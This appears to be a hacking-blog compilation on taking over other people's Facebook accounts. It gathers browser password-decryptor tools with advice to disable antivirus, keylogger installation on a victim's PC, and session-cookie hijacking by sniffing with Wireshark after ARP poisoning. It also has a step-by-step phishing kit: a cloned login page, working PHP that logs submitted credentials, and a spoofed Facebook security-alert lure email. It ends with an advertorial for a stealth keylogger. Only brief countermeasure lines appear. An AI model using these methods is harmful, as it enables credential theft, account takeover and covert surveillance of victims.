How To Hack Facebook Account | The Web Browser Attack

In this following post I ll discus with you about how you can hack facebook account using tools that can attack web browser's password safe. Each web browser has feature of storing passwords, every browser first encrypts that password and then stores it in password database but the fact is that their encryption method is so weak that these tools can retrieve passwords 
from them with or without master password enabled. They can sometimes retrieve passwords even from cookies and caches stored by web browsers that means you only need your victim to use web browser at least for once. Here I am providing you link to those tools along with small description as per by their manufactures, all of them are free and one click and output ready tools, surely they don't require tutorials just because result is obtained just by a single click.

Facebook Password Decryptor:

FacebookPasswordDecryptor is the FREE software to instantly recover stored Facebook account passwords stored by popular web browsers and messengers. Most of the applications store the Login passwords to prevent hassale of entering the password everytime by the user. Often these applications use their own proprietary encryption mechanism to store the login passwords including Facebook account passwords. FacebookPasswordDecryptor automatically crawls through each of these applications and instantly recovers the encrypted Facebook account password.

FacebookPasswordDecryptor presents both GUI interface as well as command line version, the later is more helpful for Penetration testers in their work. Apart from normal users who can use it to recover their lost password, it can come in handy for Forensic officials who can get hold of any stored Facebook Login passwords which can give vital clue in their investigation.

FacebookPasswordDecryptor is fully Portable software which can be directly run anywhere without installing locally. It also comes with Installer for those who wants to install it locally and use it on regular basis. It works on wide range of platforms starting from Windows XP to latest operating system Windows 7.

Download

Fire Master:

Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This sign-on information is stored in the encrypted form in Firefox database files residing in user's profile directory. However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as FirePassword.

Hence to protect from such threats, Firefox uses master password to provide enhanced security. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view sign-on credentials. So if you have lost the master password, then you have lost all the stored credentials as well.

So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.

Download

IE Password Decryptor:

IEPasswordDecryptor is the FREE tool to quickly and easily recover stored passwords from Internet Explorer. It can recover both Autocomplete and HTTP basic authentication passwords from IE secret store. User can double click on any of the entry to visit the website which makes it easy to verify sign-on passwords. It automatically detects the installed IE version and use appropriate technique to successfully decrypt all the stored passwords in plain text.

It also presents 'IE History Manager' interface which not only displays the contents of IE history in detail but also provides the option to add/remove websites with ease. User can save the displayed password list and IE history list to TEXT as well HTML file for offline verification & storage.

Download

Opera Password Decryptor:

OperaPasswordDecryptor is the FREE tool to instantly recover the passwords stored by all versions of Opera. Like other internet browsers such as IE, Firefox etc Opera also stores the username/passwords for websites visited by user. However passwords are stored only if the user opts to save password during authentication. This is very useful feature as it prevents user from hassle of entering password everytime.

Opera stores the passwords along with username, website and other related information in the password file (wand.dat) in an encrypted format. OperaPasswordDecryptor automatically detect the secret password file location and decrypts the passwords instantly.

Download

Safari Password Decryptor:

SafariPasswordDecryptor is the FREE software to instantly recover website login passwords stored by Safari web browser. Like other browsers, Safari also has built-in password manager which stores the login passwords for the visited websites so that user don't have to enter the password every time. Safari uses its own local storage format and encryption mechanism to securely store these login passwords. SafariPasswordDecryptor helps in automatically recovering all such website login passwords stored by Safari.

SafariPasswordDecryptor presents both GUI interface as well as command line version, the later is more helpful for Penetration testers in their work. Apart from normal users who can use it to recover their lost password, it can come in handy for Forensic officials who can get hold of any stored Website login passwords.

SafariPasswordDecryptor works on most of the Windows platforms starting from Windows XP to latest operating system, Windows 7.

Download

SX Password Suite:

SXPasswordSuite is the complete collection of all the FREE password recovery softwares released by SecurityXploded.com. It contains the latest version of all the password tools which makes it easy for the user to get all these tools at one place without worrying about downloading each of them separately.

Current version presents 6 new password recovery softwares BrowserPasswordDecryptor, iTunesPasswordDecryptor, MyspacePasswordDecryptor, PidginPasswordDecryptor, SafariPasswordDecryptor & YahooPasswordDecryptor. Also updates to few of the softwares with Safari support & fixes for Firefox.

All of these softwares work over wide range of platforms from Windows XP to latest Windows 7 version.

SXPasswordSuite includes following password recovery tools,

* BrowserPasswordDecryptor

* ChromePasswordDecryptor

* DigsbyPasswordDecryptor

* FacebookPasswordDecryptor

* FireMaster

* FireMasterLinux

* FirePassword

* FirePasswordViewer

* FTPPasswordSniffer

* GooglePasswordDecryptor

* IEPasswordDecryptor

* IMPasswordDecryptor

* iTunesPasswordDecryptor

* MirandaPasswordDecryptor

* MSNLivePasswordDecryptor

* MyspacePasswordDecryptor

* NetworkPasswordDecryptor

* OperaPasswordDecryptor

* OutlookPasswordDecryptor

* PaltalkPasswordDecryptor

* PidginPasswordDecryptor

* SafariPasswordDecryptor

* ThunderbirdPassDecryptor

* TrillianPasswordDecryptor

* TwitterPasswordDecryptor

* YahooPasswordDecryptor

Download

Note: Password recovery tools are very much prone to activate your anti-virus to alarm. I ll advise you to disable your anti-virus programs while using these tools. The best part about above password recovery tools is most of them have portable versions. Please notify me if you find any of those links broken I will replace them with working links.

How To Hack Facebook Account | Key Logger

Key-loggers or keystroke loggers are programs that can log keystrokes and save them as log files or send them via emails or ftp to the person who has installed key-logger. It can record date and time of application which was opened and capture what was typed in it may it be notepad, wordpad, MS word or any website URL, user name, password
in your web browser. It can also distinguish between other keys pressed other than character keys including ctrl, alt, enter, win etc.


If you install keystroke logger in victim's PC you will not only get his/her user name and password of facebook account but username and password of every site he/she is member of to get list of best key-loggers click here.

How To Hack Facebook Account Using Wireshark

In this tutorial we will have out look on how you can hack facebook account using wireshark. First of all I must clear you even though you'll get access to victim's account you'll not get his/her password, next this trick will work only on LAN with hub. It will also work on LAN with switch but you'll have to perform ARP poisoning, click on link to know more.
Here surely I 'll not discus how to use wireshark please read our previous tutorials to know how to use wireshark

For this hack you'll need wireshark which is a packet sniffing tool, Mozilla Firefox web browser and add n edit add-on for Mozilla Firefox. Now I assume you have all above components for hacking facebook and you are connected in a hub based LAN or LAN which has been ARP poisoned. So now click on capture button and start capturing packets.

Now using command line shell ping www.facebook.com to get its IP address, filter all IP packets having IP address of www.facebook.com and search for HTTP protocol followed by GET /home.php, this may vary depending on region and time/zone but don't bother try to search all packets with HTTP GET for cookies.

Now using command line shell ping www.facebook.com to get its IP address, filter all IP packets having IP address of www.facebook.com and search for HTTP protocol followed by GET /home.php, this may vary depending on region and time/zone but don't bother try to search all packets with HTTP GET for cookies.

Now open Mozilla Firefox browse to tools and open Cookie editor. Add each cookie to your cookie folder using Cookie editor.

After adding each value, your cookie editor will show you following values in cookie list for facebook.

Now close Cookie editor and open Facebook, you'll find yourself logged into the victims account.

Defense against this attack:
A system administrator should use tools used for countering sniffing.
Don't log-in into your accounts if you know your LAN is not protected and if you want to log-in better use a tunneled connection.

Download Wireshark from http://www.wireshark.org/.
Download Add N Edit Cookies from Add-Ons Mozzila
Read how to use wireshark.
What is ARP poisoning ?
What is sniffing ?

How To Hack Facebook Account | Phishing

In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password




First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.

action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with

action= “mail.php”

Now open notepad type following code in it and create mail.php.

Code:

---

<?php

header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

---

Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/ and select service and plan that suits you. Now in root folder of your website createFacebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.

Now sign up with http://www.hoaxmail.co.uk/ it provides spoofed email service. Now create a message from support@facebook.com to your victim.

---

Sub: Invalid activity on your facebook account

Body:

Dear facebook user (victim's facebook user name),

Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,

<link to phished site>

Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com,

Facebook, Inc,

1601 S.California Ave

Palo Alto CA 94394

US

---

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Countermeasure:

You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

Best Keylogger Software : Max Keylogger

For the past few weeks I have been busy testing keylogger softwares.There are a lot of keyloggers available on internet and selecting a best is indeed a difficult task.If you are also looking for a keylogger that tracks each key stroke,send reports to emails,take screenshots ,Is Undectable andCopy text from Clipboard then Max Keylogger is best for you.

Are Keyloggers Legal To Use?

Keyloggers are usually associated with hacking but this is not the case.It is completely legal to use keyloggers to monitor activity of employees,Children and other people using your computers.

Different People can have Different Purposes For using a Keylogger

To System administrators：
Keylogger could help you clearly know about what have been displayed in the system. protect yourself know everything they do on your computer.

To CEOs：
The computers in your company are under your full control with Max Keylogger. You will be clear about all your employees’ performances or actions anyone using your official computer. Max Keylogger protect your business.

To Parents：
You could follow up all programs your children have run. And find out what they have search on the Internet. Protect your children form online dangers.

To All Users：
Be able to build a full control on your own PC with Max Keylogger. Besides you will be clear about what was run and when, what text was typed, etc. on your PC in your absence. Using the program constantly, you will able to restore the previously typed text in case you have lost it. With the help of Max Keylogger, you also could restore the forgotten password or the lost email.

To Computer Classes and Internet Cafes：
Max Keylogger will let you know what the users have been doing on the computers.

Key features Of Max Keylogger

Stealth:-Max keylogger is completely Undectable from Task manager,Taskbar as well as Add/Remove Menu in control panel.
It can only be opened using a special key combination and cannot be uninstalled without password.

Remote Reporting:-It is one of the best and most useful feature of Max Keylogger.You can specify and Email id and interval time after which reports will be automatically sent on your email id which includes system screenshots.
I have tested it with Gmail ID and it works perfectly fine.

Organization:-You will notice a clean interface with easy to navigate icons.It has all the options along with notifications on home screen.See the screenshot below

Screenshots monitoring:You can specify the time interval as well as quality of images(black and white,coloured etc) for screenshots.It can take screenshots of complete screen or only active screen

Clipboard recording:-People usually copy/paste their passswords to make them undectable from keylogger but Max Keylogger has the ability to caputer the clipboard passwords.

Voice recording (unique feature):-This one of the Unique features of Max Keylogger.It can Record Voice and Video Calls(without video).

Click Here To Download Max Keylogger